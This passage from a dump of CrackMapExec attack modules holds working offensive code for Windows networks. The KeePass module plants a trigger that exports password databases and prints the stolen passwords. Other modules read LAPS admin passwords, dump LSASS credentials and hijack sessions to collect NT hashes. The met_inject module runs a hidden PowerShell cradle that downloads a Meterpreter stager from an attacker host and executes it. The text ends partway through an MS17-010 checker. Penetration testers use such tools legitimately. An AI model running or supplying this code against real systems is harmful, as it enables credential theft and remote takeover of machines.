export_full_path)\n\n # we poll every X seconds until the export path is found on the remote machine\n while not found:\n poll_exports_command_output = connection.execute(poll_export_command_str, True)\n if self.export_name not in poll_exports_command_output:\n print(\".\", end=\"\", flush=True)\n sleep(self.poll_frequency_seconds)\n continue\n print(\"\")\n\n # once a database is found, downloads it to the attackers machine\n context.log.success(\"Found database export !\")\n # in case multiple exports found (may happen if several users exported the database to their APPDATA)\n for count, export_path in enumerate(poll_exports_command_output.split(\"\\r\\n\")):\n try:\n buffer = BytesIO()\n connection.conn.getFile(self.share, export_path.split(\":\")[1], buffer.write)\n\n # if multiple exports found, add a number at the end of local path to prevent override\n if count > 0:\n local_full_path = self.local_export_path + \"/\" + self.export_name.split(\".\")[0] + \"_\" + str(count) + \".\" + self.export_name.split(\".\")[1]\n else:\n local_full_path = self.local_export_path + \"/\" + self.export_name\n\n # downloads the exported database\n with open(local_full_path, \"wb\") as f:\n f.write(buffer.getbuffer())\n remove_export_command_str = \"powershell.exe Remove-Item {}\".format(export_path)\n connection.execute(remove_export_command_str, True)\n context.log.success('Moved remote \"{}\" to local \"{}\"'.format(export_path, local_full_path))\n found = True\n except Exception as e:\n context.log.fail(\"Error while polling export files, exiting : {}\".format(e))\n\n def clean(self, context, connection):\n \"\"\"Checks for database export + malicious trigger on the remote host, removes everything\"\"\"\n # if the specified path is %APPDATA%, we need to check in every user's folder\n if self.export_path == \"%APPDATA%\" or self.export_path == \"%appdata%\":\n poll_export_command_str = \"powershell.exe \\\"Get-LocalUser | Where {{ $_.Enabled -eq $True }} | select name | ForEach-Object {{ Write-Output ('C:\\\\Users\\\\'+$_.Name+'\\\\AppData\\\\Roaming\\\\{}')}} | ForEach-Object {{ if (Test-Path $_ -PathType leaf){{ Write-Output $_ }}}}\\\"\".format(self.export_name)\n else:\n export_full_path = f\"'{self.export_path}\\\\{self.export_name}'\"\n poll_export_command_str = 'powershell.exe \"if (Test-Path {} -PathType leaf){{ Write-Output {} }}\"'.format(export_full_path, export_full_path)\n poll_export_command_output = connection.execute(poll_export_command_str, True)\n\n # deletes every export found on the remote machine\n if self.export_name in poll_export_command_output:\n # in case multiple exports found (may happen if several users exported the database to their APPDATA)\n for export_path in poll_export_command_output.split(\"\\r\\n\"):\n context.log.display(f\"Database export found in '{export_path}', removing\")\n remove_export_command_str = f\"powershell.exe Remove-Item {export_path}\"\n connection.execute(remove_export_command_str, True)\n else:\n context.log.display(f\"No export found in {self.export_path} , everything is cleaned\")\n\n # if the malicious trigger was not self-deleted, deletes it\n if self.trigger_added(context, connection):\n # prepare the trigger deletion script based on user-specified parameters (e.g: trigger name, etc)\n # see data/keepass_trigger_module/RemoveKeePassTrigger.ps1\n self.remove_trigger_script_str = self.remove_trigger_script_str.replace(\"REPLACE_ME_KeePassXMLPath\", self.keepass_config_path)\n self.remove_trigger_script_str = self.remove_trigger_script_str.replace(\"REPLACE_ME_TriggerName\", self.trigger_name)\n\n # actually performs trigger deletion\n if self.powershell_exec_method == \"ENCODE\":\n remove_trigger_script_b64 = b64encode(self.remove_trigger_script_str.encode(\"UTF-16LE\")).decode(\"utf-8\")\n remove_trigger_script_command_str = f\"powershell.exe -e {remove_trigger_script_b64}\"\n connection.execute(remove_trigger_script_command_str, True)\n elif self.powershell_exec_method == \"PS1\":\n try:\n self.put_file_execute_delete(context, connection, self.remove_trigger_script_str)\n except Exception as e:\n context.log.fail(f\"Error while deleting trigger, exiting: {e}\")\n sys.exit(1)\n\n # check if the specified KeePass configuration file does not contain the malicious trigger anymore\n if self.trigger_added(context, connection):\n context.log.fail(f\"Unknown error while removing trigger '{self.trigger_name}', exiting\")\n else:\n context.log.display(f\"Found trigger '{self.trigger_name}' in configuration file, removing\")\n else:\n context.log.success(f\"No trigger '{self.trigger_name}' found in '{self.keepass_config_path}', skipping\")\n\n def all_in_one(self, context, connection):\n \"\"\"Performs ADD, RESTART, POLL and CLEAN actions one after the other\"\"\"\n context.log.highlight(\"\")\n self.add_trigger(context, connection)\n context.log.highlight(\"\")\n self.restart(context, connection)\n self.poll(context, connection)\n context.log.highlight(\"\")\n context.log.display(\"Cleaning everything...\")\n self.clean(context, connection)\n self.restart(context, connection)\n context.log.highlight(\"\")\n context.log.display(\"Extracting password...\")\n self.extract_password(context)\n\n def trigger_added(self, context, connection):\n \"\"\"check if the trigger is added to the config file XML tree (returns True/False)\"\"\"\n # check if the specified KeePass configuration file exists\n if not self.keepass_config_path:\n context.log.fail(\"No KeePass configuration file specified, exiting\")\n sys.exit(1)\n\n try:\n buffer = BytesIO()\n connection.conn.getFile(self.share, self.keepass_config_path.split(\":\")[1], buffer.write)\n except Exception as e:\n context.log.fail(f\"Error while getting file '{self.keepass_config_path}', exiting: {e}\")\n sys.exit(1)\n\n try:\n keepass_config_xml_root = ElementTree.fromstring(buffer.getvalue())\n except Exception as e:\n context.log.fail(f\"Error while parsing file '{self.keepass_config_path}', exiting: {e}\")\n sys.exit(1)\n\n # check if the specified KeePass configuration file does not already contain the malicious trigger\n for trigger in keepass_config_xml_root.findall(\".//Application/TriggerSystem/Triggers/Trigger\"):\n if trigger.find(\"Name\").text == self.trigger_name:\n return True\n\n return False\n\n def put_file_execute_delete(self, context, connection, psh_script_str):\n \"\"\"Helper to upload script to a temporary folder, run then deletes it\"\"\"\n script_str_io = StringIO(psh_script_str)\n connection.conn.putFile(self.share, self.remote_temp_script_path.split(\":\")[1], script_str_io.read)\n script_execute_cmd = \"powershell.exe -ep Bypass -F {}\".format(self.remote_temp_script_path)\n connection.execute(script_execute_cmd, True)\n remove_remote_temp_script_cmd = 'powershell.exe \"Remove-Item \"{}\"\"'.format(self.remote_temp_script_path)\n connection.execute(remove_remote_temp_script_cmd)\n\n def extract_password(self, context):\n xml_doc_path = os.path.abspath(self.local_export_path + \"/\" + self.export_name)\n xml_tree = ElementTree.parse(xml_doc_path)\n root = xml_tree.getroot()\n to_string = ElementTree.tostring(root, encoding=\"UTF-8\", method=\"xml\")\n xml_to_dict = parse(to_string)\n dump = json.dumps(xml_to_dict)\n obj = json.loads(dump)\n\n if len(obj[\"KeePassFile\"][\"Root\"][\"Group\"][\"Entry\"]):\n for obj2 in obj[\"KeePassFile\"][\"Root\"][\"Group\"][\"Entry\"]:\n for password in obj2[\"String\"]:\n if password[\"Key\"] == \"Password\":\n context.log.highlight(str(password[\"Key\"]) + \" : \" + str(password[\"Value\"][\"#text\"]))\n else:\n context.log.highlight(str(password[\"Key\"]) + \" : \" + str(password[\"Value\"]))\n context.log.highlight(\"\")\n if len(obj[\"KeePassFile\"][\"Root\"][\"Group\"][\"Group\"]):\n for obj2 in obj[\"KeePassFile\"][\"Root\"][\"Group\"][\"Group\"]:\n try:\n for obj3 in obj2[\"Entry\"]:\n for password in obj3[\"String\"]:\n if password[\"Key\"] == \"Password\":\n context.log.highlight(str(password[\"Key\"]) + \" : \" + str(password[\"Value\"][\"#text\"]))\n else:\n context.log.highlight(str(password[\"Key\"]) + \" : \" + str(password[\"Value\"]))\n context.log.highlight(\"\")\n except KeyError:\n pass\n" }, { "path": "cme/modules/laps.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport json\n\nfrom impacket.ldap import ldapasn1 as ldapasn1_impacket\nfrom cme.protocols.ldap.laps import LDAPConnect, LAPSv2Extract\n\nclass CMEModule:\n \"\"\"\n Module by technobro refactored by @mpgn (now compatible with LDAP protocol + filter by computer)\n\n Initial module:\n @T3KX: https://github.com/T3KX/Crackmapexec-LAPS\n\n Credit: @mpgn_x64, @n00py1\n \"\"\"\n\n name = \"laps\"\n description = \"Retrieves the LAPS passwords\"\n supported_protocols = [\"ldap\"]\n opsec_safe = True\n multiple_hosts = False\n\n def options(self, context, module_options):\n \"\"\"\n COMPUTER Computer name or wildcard ex: WIN-S10, WIN-* etc. Default: *\n \"\"\"\n\n self.computer = None\n if \"COMPUTER\" in module_options:\n self.computer = module_options[\"COMPUTER\"]\n\n def on_login(self, context, connection):\n context.log.display(\"Getting LAPS Passwords\")\n if self.computer is not None:\n searchFilter = \"(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*))(name=\" + self.computer + \"))\"\n else:\n searchFilter = \"(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*)))\"\n attributes = [\n \"msLAPS-EncryptedPassword\",\n \"msLAPS-Password\",\n \"ms-MCS-AdmPwd\",\n \"sAMAccountName\",\n ]\n results = connection.search(searchFilter, attributes, 0)\n results = [r for r in results if isinstance(r, ldapasn1_impacket.SearchResultEntry)]\n if len(results) != 0:\n laps_computers = []\n for computer in results:\n msMCSAdmPwd = \"\"\n sAMAccountName = \"\"\n values = {str(attr[\"type\"]).lower(): attr[\"vals\"][0] for attr in computer[\"attributes\"]}\n if \"mslaps-encryptedpassword\" in values:\n msMCSAdmPwd = values[\"mslaps-encryptedpassword\"]\n d = LAPSv2Extract(\n bytes(msMCSAdmPwd),\n connection.username if connection.username else \"\",\n connection.password if connection.password else \"\",\n connection.domain,\n connection.nthash if connection.nthash else \"\",\n connection.kerberos,\n connection.kdcHost,\n 339)\n try:\n data = d.run()\n except Exception as e:\n self.logger.fail(str(e))\n return\n r = json.loads(data)\n laps_computers.append((str(values[\"samaccountname\"]), r[\"n\"], str(r[\"p\"])))\n elif \"mslaps-password\" in values:\n r = json.loads(str(values[\"mslaps-password\"]))\n laps_computers.append((str(values[\"samaccountname\"]), r[\"n\"], str(r[\"p\"])))\n elif \"ms-mcs-admpwd\" in values:\n laps_computers.append((str(values[\"samaccountname\"]), \"\", str(values[\"ms-mcs-admpwd\"])))\n else:\n context.log.fail(\"No result found with attribute ms-MCS-AdmPwd or msLAPS-Password\")\n\n laps_computers = sorted(laps_computers, key=lambda x: x[0])\n for sAMAccountName, user, password in laps_computers:\n context.log.highlight(\"Computer:{} User:{:<15} Password:{}\".format(sAMAccountName, user, password))\n else:\n context.log.fail(\"No result found with attribute ms-MCS-AdmPwd or msLAPS-Password !\")\n" }, { "path": "cme/modules/ldap-checker.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport socket\nimport ssl\nimport asyncio\n\nfrom msldap.connection import MSLDAPClientConnection\nfrom msldap.commons.target import MSLDAPTarget\n\nfrom asyauth.common.constants import asyauthSecret\nfrom asyauth.common.credentials.ntlm import NTLMCredential\nfrom asyauth.common.credentials.kerberos import KerberosCredential\n\nfrom asysocks.unicomm.common.target import UniTarget, UniProto\n\nclass CMEModule:\n \"\"\"\n Checks whether LDAP signing and channelbinding are required.\n\n Module by LuemmelSec (@theluemmel), updated by @zblurx\n Original work thankfully taken from @zyn3rgy's Ldap Relay Scan project: https://github.com/zyn3rgy/LdapRelayScan\n \"\"\"\n\n name = \"ldap-checker\"\n description = \"Checks whether LDAP signing and binding are required and / or enforced\"\n supported_protocols = [\"ldap\"]\n opsec_safe = True\n multiple_hosts = True\n\n def options(self, context, module_options):\n \"\"\"\n No options available.\n \"\"\"\n pass\n\n def on_login(self, context, connection):\n # Conduct a bind to LDAPS and determine if channel\n # binding is enforced based on the contents of potential\n # errors returned. This can be determined unauthenticated,\n # because the error indicating channel binding enforcement\n # will be returned regardless of a successful LDAPS bind.\n async def run_ldaps_noEPA(target, credential):\n ldapsClientConn = MSLDAPClientConnection(target, credential)\n _, err = await ldapsClientConn.connect()\n if err is not None:\n context.log.fail(\"ERROR while connecting to \" + str(connection.domain) + \": \" + str(err))\n exit()\n _, err = await ldapsClientConn.bind()\n if \"data 80090346\" in str(err):\n return True # channel binding IS enforced\n elif \"data 52e\" in str(err):\n return False # channel binding not enforced\n elif err is None:\n # LDAPS bind successful\n # because channel binding is not enforced\n return False\n\n # Conduct a bind to LDAPS with channel binding supported\n # but intentionally miscalculated. In the case that and\n # LDAPS bind has without channel binding supported has occured,\n # you can determine whether the policy is set to \"never\" or\n # if it's set to \"when supported\" based on the potential\n # error recieved from the bind attempt.\n async def run_ldaps_withEPA(target, credential):\n ldapsClientConn = MSLDAPClientConnection(target, credential)\n _, err = await ldapsClientConn.connect()\n if err is not None:\n context.log.fail(\"ERROR while connecting to \" + str(connection.domain) + \": \" + str(err))\n exit()\n # forcing a miscalculation of the \"Channel Bindings\" av pair in Type 3 NTLM message\n ldapsClientConn.cb_data = b\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n _, err = await ldapsClientConn.bind()\n if \"data 80090346\" in str(err):\n return True\n elif \"data 52e\" in str(err):\n return False\n elif err is not None:\n context.log.fail(\"ERROR while connecting to \" + str(connection.domain) + \": \" + str(err))\n elif err is None:\n return False\n\n # Domain Controllers do not have a certificate setup for\n # LDAPS on port 636 by default. If this has not been setup,\n # the TLS handshake will hang and you will not be able to\n # interact with LDAPS. The condition for the certificate\n # existing as it should is either an error regarding\n # the fact that the certificate is self-signed, or\n # no error at all. Any other \"successful\" edge cases\n # not yet accounted for.\n def DoesLdapsCompleteHandshake(dcIp):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.settimeout(5)\n ssl_sock = ssl.wrap_socket(\n s,\n cert_reqs=ssl.CERT_OPTIONAL,\n suppress_ragged_eofs=False,\n do_handshake_on_connect=False,\n )\n ssl_sock.connect((dcIp, 636))\n try:\n ssl_sock.do_handshake()\n ssl_sock.close()\n return True\n except Exception as e:\n if \"CERTIFICATE_VERIFY_FAILED\" in str(e):\n ssl_sock.close()\n return True\n if \"handshake operation timed out\" in str(e):\n ssl_sock.close()\n return False\n else:\n context.log.fail(\"Unexpected error during LDAPS handshake: \" + str(e))\n ssl_sock.close()\n return False\n\n # Conduct and LDAP bind and determine if server signing\n # requirements are enforced based on potential errors\n # during the bind attempt.\n async def run_ldap(target, credential):\n ldapsClientConn = MSLDAPClientConnection(target, credential)\n _, err = await ldapsClientConn.connect()\n if err is None:\n _, err = await ldapsClientConn.bind()\n if \"stronger\" in str(err):\n return True # because LDAP server signing requirements ARE enforced\n elif (\"data 52e\" or \"data 532\") in str(err):\n context.log.fail(\"Not connected... exiting\")\n exit()\n elif err is None:\n return False\n else:\n context.log.fail(str(err))\n\n # Run trough all our code blocks to determine LDAP signing and channel binding settings. \n stype = asyauthSecret.PASS if not connection.nthash else asyauthSecret.NT\n secret = connection.password if not connection.nthash else connection.nthash\n if not connection.kerberos:\n credential = NTLMCredential(\n secret=secret,\n username=connection.username,\n domain=connection.domain,\n stype=stype,\n )\n else:\n kerberos_target = UniTarget(\n connection.hostname + '.' + connection.domain,\n 88,\n UniProto.CLIENT_TCP,\n proxies=None,\n dns=None,\n dc_ip=connection.domain,\n domain=connection.domain\n )\n credential = KerberosCredential(\n target=kerberos_target,\n secret=secret,\n username=connection.username,\n domain=connection.domain,\n stype=stype,\n )\n\n target = MSLDAPTarget(connection.host, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)\n ldapIsProtected = asyncio.run(run_ldap(target, credential))\n\n if ldapIsProtected == False:\n context.log.highlight(\"LDAP Signing NOT Enforced!\")\n elif ldapIsProtected == True:\n context.log.fail(\"LDAP Signing IS Enforced\")\n else:\n context.log.fail(\"Connection fail, exiting now\")\n exit()\n\n if DoesLdapsCompleteHandshake(connection.host) == True:\n target = MSLDAPTarget(connection.host, 636, UniProto.CLIENT_SSL_TCP, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)\n ldapsChannelBindingAlwaysCheck = asyncio.run(run_ldaps_noEPA(target, credential))\n target = MSLDAPTarget(connection.host, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)\n ldapsChannelBindingWhenSupportedCheck = asyncio.run(run_ldaps_withEPA(target, credential))\n if ldapsChannelBindingAlwaysCheck == False and ldapsChannelBindingWhenSupportedCheck == True:\n context.log.highlight('LDAPS Channel Binding is set to \"When Supported\"')\n elif ldapsChannelBindingAlwaysCheck == False and ldapsChannelBindingWhenSupportedCheck == False:\n context.log.highlight('LDAPS Channel Binding is set to \"NEVER\"')\n elif ldapsChannelBindingAlwaysCheck == True:\n context.log.fail('LDAPS Channel Binding is set to \"Required\"')\n else:\n context.log.fail(\"\\nSomething went wrong...\")\n exit()\n else:\n context.log.fail(connection.domain + \" - cannot complete TLS handshake, cert likely not configured\")\n" }, { "path": "cme/modules/lsassy_dump.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Author:\n# Romain Bentz (pixis - @hackanddo)\n# Website:\n# https://beta.hackndo.com [FR]\n# https://en.hackndo.com [EN]\n\nfrom lsassy.dumper import Dumper\nfrom lsassy.impacketfile import ImpacketFile\nfrom lsassy.parser import Parser\nfrom lsassy.session import Session\n\nfrom cme.helpers.bloodhound import add_user_bh\n\n\nclass CMEModule:\n name = \"lsassy\"\n description = \"Dump lsass and parse the result remotely with lsassy\"\n supported_protocols = [\"smb\"]\n opsec_safe = True # writes temporary files, and it's possible for them to not be deleted\n multiple_hosts = True\n\n def __init__(self, context=None, module_options=None):\n self.context = context\n self.module_options = module_options\n self.method = None\n\n def options(self, context, module_options):\n \"\"\"\n METHOD Method to use to dump lsass.exe with lsassy\n \"\"\"\n self.method = \"comsvcs\"\n if \"METHOD\" in module_options:\n self.method = module_options[\"METHOD\"]\n\n def on_admin_login(self, context, connection):\n host = connection.host\n domain_name = connection.domain\n username = connection.username\n password = getattr(connection, \"password\", \"\")\n lmhash = getattr(connection, \"lmhash\", \"\")\n nthash = getattr(connection, \"nthash\", \"\")\n\n session = Session()\n session.get_session(\n address=host,\n target_ip=host,\n port=445,\n lmhash=lmhash,\n nthash=nthash,\n username=username,\n password=password,\n domain=domain_name,\n )\n\n if session.smb_session is None:\n context.log.fail(\"Couldn't connect to remote host\")\n return False\n\n dumper = Dumper(session, timeout=10, time_between_commands=7).load(self.method)\n if dumper is None:\n context.log.fail(\"Unable to load dump method '{}'\".format(self.method))\n return False\n\n file = dumper.dump()\n if file is None:\n context.log.fail(\"Unable to dump lsass\")\n return False\n\n parsed = Parser(file).parse()\n if parsed is None:\n context.log.fail(\"Unable to parse lsass dump\")\n return False\n credentials, tickets, masterkeys = parsed\n\n file.close()\n context.log.debug(f\"Closed dumper file\")\n file_path = file.get_file_path()\n context.log.debug(f\"File path: {file_path}\")\n try:\n deleted_file = ImpacketFile.delete(session, file_path)\n if deleted_file:\n context.log.debug(f\"Deleted dumper file\")\n else:\n context.log.fail(f\"[OPSEC] No exception, but failed to delete file: {file_path}\")\n except Exception as e:\n context.log.fail(f\"[OPSEC] Error deleting temporary lsassy dumper file {file_path}: {e}\")\n\n if credentials is None:\n credentials = []\n\n for cred in credentials:\n c = cred.get_object()\n context.log.debug(f\"Cred: {c}\")\n\n credentials = [cred.get_object() for cred in credentials if cred.ticket is None and cred.masterkey is None and not cred.get_username().endswith(\"$\")]\n credentials_unique = []\n credentials_output = []\n context.log.debug(f\"Credentials: {credentials}\")\n\n for cred in credentials:\n context.log.debug(f\"Credential: {cred}\")\n if [\n cred[\"domain\"],\n cred[\"username\"],\n cred[\"password\"],\n cred[\"lmhash\"],\n cred[\"nthash\"],\n ] not in credentials_unique:\n credentials_unique.append(\n [\n cred[\"domain\"],\n cred[\"username\"],\n cred[\"password\"],\n cred[\"lmhash\"],\n cred[\"nthash\"],\n ]\n )\n credentials_output.append(cred)\n\n context.log.debug(f\"Calling process_credentials\")\n self.process_credentials(context, connection, credentials_output)\n\n def process_credentials(self, context, connection, credentials):\n if len(credentials) == 0:\n context.log.display(\"No credentials found\")\n credz_bh = []\n domain = None\n for cred in credentials:\n if cred[\"domain\"] == None:\n cred[\"domain\"] = \"\"\n domain = cred[\"domain\"]\n if \".\" not in cred[\"domain\"] and cred[\"domain\"].upper() in connection.domain.upper():\n domain = connection.domain # slim shady\n self.save_credentials(\n context,\n connection,\n cred[\"domain\"],\n cred[\"username\"],\n cred[\"password\"],\n cred[\"lmhash\"],\n cred[\"nthash\"],\n )\n self.print_credentials(\n context,\n cred[\"domain\"],\n cred[\"username\"],\n cred[\"password\"],\n cred[\"lmhash\"],\n cred[\"nthash\"],\n )\n credz_bh.append({\"username\": cred[\"username\"].upper(), \"domain\": domain.upper()})\n add_user_bh(credz_bh, domain, context.log, connection.config)\n\n @staticmethod\n def print_credentials(context, domain, username, password, lmhash, nthash):\n if password is None:\n password = \":\".join(h for h in [lmhash, nthash] if h is not None)\n output = \"%s\\\\%s %s\" % (domain, username, password)\n context.log.highlight(output)\n\n @staticmethod\n def save_credentials(context, connection, domain, username, password, lmhash, nthash):\n host_id = context.db.get_hosts(connection.host)[0][0]\n if password is not None:\n credential_type = \"plaintext\"\n else:\n credential_type = \"hash\"\n password = \":\".join(h for h in [lmhash, nthash] if h is not None)\n context.db.add_credential(credential_type, domain, username, password, pillaged_from=host_id)\n" }, { "path": "cme/modules/masky.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom masky import Masky\nfrom cme.helpers.bloodhound import add_user_bh\n\n\nclass CMEModule:\n name = \"masky\"\n description = \"Remotely dump domain user credentials via an ADCS and a KDC\"\n supported_protocols = [\"smb\"]\n opsec_safe = True\n multiple_hosts = True\n\n def options(self, context, module_options):\n \"\"\"\n CA Certificate Authority Name (CA_SERVER\\CA_NAME)\n TEMPLATE Template name allowing users to authenticate with (default: User)\n DC_IP IP Address of the domain controller\n AGENT_EXE Path to a custom executable masky agent to be deployed\n \"\"\"\n self.template = \"User\"\n self.ca = None\n self.dc_ip = None\n self.agent_exe = None\n self.file_args = False\n\n if \"CA\" in module_options:\n self.ca = module_options[\"CA\"]\n\n if \"TEMPLATE\" in module_options:\n self.template = module_options[\"TEMPLATE\"]\n\n if \"DC_IP\" in module_options:\n self.dc_ip = module_options[\"DC_IP\"]\n\n if \"AGENT_EXE\" in module_options:\n self.agent_exe = module_options[\"AGENT_EXE\"]\n self.file_args = True\n\n def on_admin_login(self, context, connection):\n if not self.ca:\n context.log.fail(\"Please provide a valid CA server and CA name (CA_SERVER\\CA_NAME)\")\n return False\n\n host = connection.host\n domain = connection.domain\n username = connection.username\n kerberos = connection.kerberos\n password = getattr(connection, \"password\", \"\")\n lmhash = getattr(connection, \"lmhash\", \"\")\n nthash = getattr(connection, \"nthash\", \"\")\n\n m = Masky(\n ca=self.ca,\n template=self.template,\n user=username,\n dc_ip=self.dc_ip,\n domain=domain,\n password=password,\n hashes=f\"{lmhash}:{nthash}\",\n kerberos=kerberos,\n exe_path=self.agent_exe,\n file_args=self.file_args,\n )\n\n context.log.display(\"Running Masky on the targeted host\")\n rslts = m.run(host)\n tracker = m.get_last_tracker()\n\n self.process_results(connection, context, rslts, tracker)\n\n return self.process_errors(context, tracker)\n\n def process_results(self, connection, context, rslts, tracker):\n if not tracker.nb_hijacked_users:\n context.log.display(\"No users' sessions were hijacked\")\n else:\n context.log.display(f\"{tracker.nb_hijacked_users} session(s) successfully hijacked\")\n context.log.display(\"Attempting to retrieve NT hash(es) via PKINIT\")\n\n if not rslts:\n return False\n\n pwned_users = 0\n for user in rslts.users:\n if user.nthash:\n context.log.highlight(f\"{user.domain}\\{user.name} {user.nthash}\")\n self.process_credentials(connection, context, user)\n pwned_users += 1\n\n if pwned_users:\n context.log.success(f\"{pwned_users} NT hash(es) successfully collected\")\n else:\n context.log.fail(\"Unable to collect NT hash(es) from the hijacked session(s)\")\n return True\n\n def process_credentials(self, connection, context, user):\n host = context.db.get_hosts(connection.host)[0][0]\n context.db.add_credential(\n \"hash\",\n user.domain,\n user.name,\n user.nthash,\n pillaged_from=host,\n )\n add_user_bh(user.name, user.domain, context.log, connection.config)\n\n def process_errors(self, context, tracker):\n ret = True\n\n if tracker.last_error_msg:\n context.log.fail(tracker.last_error_msg)\n ret = False\n\n if not tracker.files_cleaning_success:\n context.log.fail(\"Fail to clean files related to Masky\")\n context.log.fail((f\"Please remove the files named '{tracker.agent_filename}', '{tracker.error_filename}', \" f\"'{tracker.output_filename}' & '{tracker.args_filename}' within the folder '\\\\Windows\\\\Temp\\\\'\"))\n ret = False\n\n if not tracker.svc_cleaning_success:\n context.log.fail(f\"Fail to remove the service named '{tracker.svc_name}', please remove it manually\")\n ret = False\n return ret\n" }, { "path": "cme/modules/met_inject.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom sys import exit\n\n\nclass CMEModule:\n \"\"\"\n Downloads the Meterpreter stager and injects it into memory using PowerSploit's Invoke-Shellcode.ps1 script\n Module by @byt3bl33d3r\n \"\"\"\n\n name = \"met_inject\"\n description = \"Downloads the Meterpreter stager and injects it into memory\"\n supported_protocols = [\"smb\", \"mssql\"]\n opsec_safe = True\n multiple_hosts = True\n\n def __init__(self, context=None, module_options=None):\n self.rand = None\n self.srvport = None\n self.srvhost = None\n self.met_ssl = None\n self.context = context\n self.module_options = module_options\n\n def options(self, context, module_options):\n \"\"\"\n SRVHOST IP hosting of the stager server\n SRVPORT Stager port\n RAND Random string given by metasploit (if using web_delivery)\n SSL Stager server use https or http (default: https)\n\n multi/handler method that don't require RAND:\n Set LHOST and LPORT (called SRVHOST and SRVPORT in CME module options)\n Set payload to one of the following (non-exhaustive list):\n windows/x64/powershell_reverse_tcp\n windows/x64/powershell_reverse_tcp_ssl\n Web Delivery Method (exploit/multi/script/web_delivery):\n Set SRVHOST and SRVPORT\n Set payload to what you want (windows/meterpreter/reverse_https, etc)\n after running, copy the end of the URL printed (e.g. M5LemwmDHV) and set RAND to that\n \"\"\"\n\n self.met_ssl = \"https\"\n\n if \"SRVHOST\" not in module_options or \"SRVPORT\" not in module_options:\n context.log.fail(\"SRVHOST and SRVPORT options are required!\")\n exit(1)\n\n if \"SSL\" in module_options:\n self.met_ssl = module_options[\"SSL\"]\n if \"RAND\" in module_options:\n self.rand = module_options[\"RAND\"]\n\n self.srvhost = module_options[\"SRVHOST\"]\n self.srvport = module_options[\"SRVPORT\"]\n\n def on_admin_login(self, context, connection):\n # stolen from https://github.com/jaredhaight/Invoke-MetasploitPayload\n command = \"\"\"$url=\"{}://{}:{}/{}\"\n $DownloadCradle ='[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};$client = New-Object Net.WebClient;$client.Proxy=[Net.WebRequest]::GetSystemWebProxy();$client.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;Invoke-Expression $client.downloadstring('''+$url+'''\");'\n $PowershellExe=$env:windir+'\\\\syswow64\\\\WindowsPowerShell\\\\v1.0\\powershell.exe'\n if([Environment]::Is64BitProcess) {{ $PowershellExe='powershell.exe'}}\n $ProcessInfo = New-Object System.Diagnostics.ProcessStartInfo\n $ProcessInfo.FileName=$PowershellExe\n $ProcessInfo.Arguments=\"-nop -c $DownloadCradle\"\n $ProcessInfo.UseShellExecute = $False\n $ProcessInfo.RedirectStandardOutput = $True\n $ProcessInfo.CreateNoWindow = $True\n $ProcessInfo.WindowStyle = \"Hidden\"\n $Process = [System.Diagnostics.Process]::Start($ProcessInfo)\"\"\".format(\n \"http\" if self.met_ssl == \"http\" else \"https\",\n self.srvhost,\n self.srvport,\n self.rand,\n )\n context.log.debug(command)\n connection.ps_execute(command, force_ps32=True)\n context.log.success(\"Executed payload\")\n" }, { "path": "cme/modules/ms17-010.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# All credits to https://github.com/d4t4s3c/Win7Blue\n# @d4t4s3c\n# Module by @mpgn_x64\n\nfrom ctypes import *\nimport socket\nimport struct\n\n\nclass CMEModule:\n name = \"ms17-010\"\n description = \"MS17-010, /!\\ not tested oustide home lab\"\n supported_protocols = [\"smb\"]\n opsec_safe = True\n multiple_hosts = True\n\n def options(self, context, module_options):\n \"\"\" \"\"\"\n\n def on_login(self, context, connection):\n if check(connection.host):\n context.log.highlight(\"VULNERABLE\")\n context.log.highlight(\"Next step: https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/\")\n\n\nclass SMB_HEADER(Structure):\n \"\"\"SMB Header decoder.\"\"\"\n\n _pack_ = 1\n\n _fields_ = [\n (\"server_component\", c_uint32),\n (\"smb_command\", c_uint8),\n (\"error_class\", c_uint8),\n (\"reserved1\", c_uint8),\n (\"error_code\", c_uint16),\n (\"flags\", c_uint8),\n (\"flags2\", c_uint16),\n (\"process_id_high\", c_uint16),\n (\"signature\", c_uint64),\n (\"reserved2\", c_uint16),\n (\"tree_id\", c_uint16),\n (\"process_id\", c_uint16),\n (\"user_id\", c_uint16),\n (\"multiplex_id\", c_uint16),\n ]\n\n def __new__(self, buffer=None):\n return self.from_buffer_copy(buffer)\n\n\ndef generate_smb_proto_payload(*protos):\n \"\"\"Generate SMB Protocol. Pakcet protos in order.\"\"\"\n hexdata = []\n for proto in protos:\n hexdata.extend(proto)\n return \"\".join(hexdata)\n\n\ndef calculate_doublepulsar_xor_key(s):\n \"\"\"Calaculate Doublepulsar Xor Key\"\"\"\n x = 2 * s ^ (((s & 0xFF00 | (s << 16)) << 8) | (((s >> 16) | s & 0xFF0000) >> 8))\n x = x & 0xFFFFFFFF\n return x\n\n\ndef negotiate_proto_request():\n \"\"\"Generate a negotiate_proto_request packet.\"\"\"\n netbios = [\"\\x00\", \"\\x00\\x00\\x54\"]\n\n smb_header = [\n \"\\xFF\\x53\\x4D\\x42\",\n 